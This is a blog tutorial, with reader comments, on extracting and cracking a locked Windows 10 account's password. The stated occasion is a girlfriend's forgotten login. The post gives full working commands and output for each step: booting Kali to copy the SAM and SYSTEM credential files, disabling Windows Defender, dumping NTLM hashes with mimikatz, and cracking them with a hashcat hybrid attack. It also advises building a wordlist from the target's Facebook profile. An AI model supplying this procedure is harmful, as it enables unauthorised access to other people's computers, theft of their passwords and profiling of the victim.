Retrieving lost Windows 10 password, using Kali Linux, mimikatz and hashcat

Recently, my girlfriend forgot her Windows 10 password, locking her out of her almost-brand-new laptop. I took it as a personal challenge to break into the Windows security layer and extract her password. Resetting the password was not an option!

With Windows 10 Anniversary Update, things got tougher when it comes to cracking Windows password but after trying different approaches, I managed to do it. Here’s a guide to show you the steps to follow.

TLDR; We’ll be cracking Windows 10 password without admin access, and this method works with Windows 10 Anniversary Update!

Requirement: a password-locked computer, a not-password-locked computer, one (or two) USB keys.

Steps overview:

  1. Retrieve the encrypted Windows 10 password database: SAM and SYSTEM files
  2. Extract Windows 10 password hash from those files using mimikatz
  3. Crack the hash quickly using hashcat

Part I – Retrieving SAM and SYSTEM files from Windows

To extract those files without needing to log-in onto the computer, we’ll need to start the system using an OS stored on a USB key. Then we’ll be able to access the Windows file system.

Step 1 – Booting on a Live USB OS

You can download Kali Linux Light here: Kali Linux download page.

Flash the .iso on the USB using software like ISO to USB or Rufus.

Screenshot Flashing Kali

Flashing Kali ISO on a USB key using Rufus.

Now you can boot on the ISO. To do so, turn off the computer you want to crack and plug-in the USB key. Then start the computer and enter the BIOS by pressing the F11 or DELETE key. Reorder devices in Boot Priority, putting your USB key on top.

You will probably have to enable Legacy Support in your BIOS.

Screenshot - BIOS Legacy Support

Enabling Legacy Support in the BIOS.

You can then Save and exit (F10), and proceed to booting on the OS.

Step 2 – Accessing Windows file system

Once the live OS is loaded, open-up a file manager. Your WINDOWS partition might be available as read-only. If that’s the case, you can jump directly to Step 3.

If Windows partition is not available, do the following:

Find the correct device to mount.

$ fdisk -l
  Device Boot      Start         End      Sectors   Size   System 
/dev/sdb1             269       10382    81232672   260M   EFI System
/dev/sdb2           10383       19452    72846742    16M   Microsoft reserved
/dev/sdb3           10383       11034     5229157   118G   Microsft basic data
/dev/sda7           11035       19439    67505130   980M   Windows recovery environment

You can deduce which device is the main Windows partition by looking the Size column. Here 118G is the one we’re looking for, as the SSD capacity is 128 GB.
Also, you might have multiple physical disks, so it’s up to you to choose the right one.

In this case, the device we want to mount is /dev/sdb3.

Then you can mount the drive to the Linux file system:

$ mkdir /media/windows
$ sudo ntfs-3g -o remove_hiberfile /dev/sdb3 /media/windows

If the second command fails, you can do:

$ sudo ntfsfix /dev/<span style="text-decoration: underline;">sdb3</span> 
Mounting volume... Windows is hibernated, refused to mount.
Attempting to correct errors... 
Processing $MFT and $MFTMirr...
Reading $MFT... OK
Reading $MFTMirr... OK
Comparing $MFTMirr to $MFT... OK
Processing of $MFT and $MFTMirr completed successfully.
Setting required flags on partition... OK
Going to empty the journal ($LogFile)... OK
Windows is hibernated, refused to mount.
Remount failed: Operation not permitted

Even if the “Remount failed“, we can still mount the Windows partition using:

$ sudo <span class="__in">ntfs</span>-<span class="__in">3g</span> -o remove_hiberfile /dev/<span style="text-decoration: underline;">sdb3</span> /media/windows
$ cd /media/windows
$ ls

Now, if you mounted the correct device, the ls command should display a list of familiar directories : “Windows”, “Program Files (x86)”, “Users”.

Step 3 Dumping SAM and SYSTEM files

Now, assuming that we successfully mounted Windows partition in /media/windows, you can copy the following files onto a USB key:


Those two files will be needed to retrieve the hash of your Windows 10 password.

You can now log-out of the live OS, we’re done for this part.

Part II – Getting the hash

This part will be much quicker, but that’s were the Windows 10 Anniversary Update can cause troubles if you’re not using the right software.

First, disable Windows Defender Real-time Protection (Windows start menu -> Search “Windows Defender” -> Windows Defender Security Center -> Virus &amp;amp; threat protection -> Virus &amp;amp; threat protection settings -> Turn-off “Real-time Protection”).

Then, download and extract the latest mimikatz release: Mimikatz releases page.

Copy the SAM and SYSTEM files into mimikatz/x64.

Now open a terminal in mimikatz/x64 directory (you can do that by typing “cmd” in the Windows explorer address bar)

C:\Users\me\Downloads\mimikatz\x64> mimikatz.exe

  .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##    /* * *
 ## \ / ##    Benjamin DELPY `gentilkiwi` ( )
 '## v ##'       (oe.eo)
  '#####'                                      with 13 modules * * */

mimikatz # lsadump::sam /system:SYSTEM_export /SAM:SAM_export

Where SYSTEM_export and SAM_export are the files we copied in the previous step.

Even if we can’t retrieve the actual Windows 10 password right now, the tool can provide us with its hash. It will list the available users and their respective hashes. Find the one you want to crack and you’re good to go to next part.

Part III – Cracking the hash

Download hashcat: grab the binaries here.

Now, we have to gather as much information as we can about the password we’re about to crack. By doing so, it will allow the cracking tool to go significantly faster.

You should first ask the owner of the device what kind of Windows password they usually use, in order to get a rough idea of its structure. If the password is not completely random, you can take advantage of a dictionary to leverage your brute-force power in a more clever way. With hashcat, this is called a hybrid attack.
For instance, in my case, the forgotten password was probably a common name, followed by a bunch of random-ish letters/numbers (ie: tomsdev54d). Assuming you stored the hash in phihash.txt and that you have a dictionary file phidict.log, here’s the hashcat command to match this kind of password:

hashcat64.exe -m 1000 -a 6 phihash.txt phidict.log ?a?a?a

If the dictionary contains “tomsdev”, the password will be cracked in less a minute and the result will be available in the following file hashcat.potfile!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: phihash.txt
Time.Started.....: Tue Dec 05 17:00:33 2017 (5 secs)
Time.Estimated...: Tue Dec 05 17:00:38 2017 (0 secs)
Guess.Base.......: File (phidict.log), Left Side
Guess.Mod........: Mask (?a?a?a) [3], Right Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.Dev.#1.....: 2674.4 MH/s (4.25ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 13245574144/22427215250 (59.06%)
Rejected.........: 0/13245574144 (0.00%)
Restore.Point....: 0/26158 (0.00%)
Candidates.#1....: 😋,bS -> logof1K
HWMon.Dev.#1.....: Temp: 52c Fan: 33% Util: 86% Core:1885MHz Mem:3802MHz Bus:16

Started: Tue Dec 05 17:00:31 2017
Stopped: Tue Dec 05 17:00:40 2017

Searching more efficiently

If we had to use brute-force to find this 10-characters password, it would have probably taken days. Instead, we’re searching for all combinaisons of “<dictionary word><up to 3 random characters>“. This is roughly equivalent in terms of complexity to a password length of 4. You can then tweak the pattern according to your needs (see hashcat documentation for more information).
For instance, you have to change the command to match a slightly different pattern:

<up to 3 random characters><dictionary word>
hashcat64.exe -m 1000 -a 6 phihash.txt ?a?a?a phidict.log

Which dictionary should I use?

As I mentioned, this is completely up to the kind of password you want to crack. I recommend using at least a localized dictionary that matches the user’s mother-tongue.

But a better way of doing this is to build a custom dictionary with the user’s own word, names, places, nicknames, etc. That’s what I did using Facebook, and it worked wonders, saving me countless days of brainless brute-forcing and wasted GPU cycles.


I hope that this guide helped you retrieving your lost Windows password and that you had fun acting hacker-ish while doing it. Feel free to ask any questions in comments.


Retrieving lost Windows 10 password, using Kali Linux, mimikatz and hashcat was last modified: December 5th, 2017 by Tom Guillermin

8 thoughts on Retrieving lost Windows 10 password, using Kali Linux, mimikatz and hashcat

    • Well in that case, part of the challenge was to actually find what the password was! But it surely is more simple via a password reset, if your goal is only to logon on whatever account. And I guess Microsoft will eventually fix this exe swapping exploit before changing the way they store passwords 😉
      But thanks for sharing this alternative!

  1. hmm most of these comments is talking about resetting password…
    but the tutorial is talking about find the forgotten password ..
    for easy and fast solution .. resetting password is the best way.
    some people do this tutorial for some reason :3 .. i will choose get the old password xD

    • Thank you Wofly. I rarely post comments but this is a great blog post and all the comments seem to completely miss the point of it.

      Yes, access to windows is faster and easier through reset, but if your goal is to gain knowledge of the password, this is the way to go.

      Thanks and kudos to Tom for writing this! 🙂

  2. Thanks for this info Tom!
    Resetting the password is not the hard part. I can surely see this option for my forensic job as part of logging in to other devices that we have seized.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.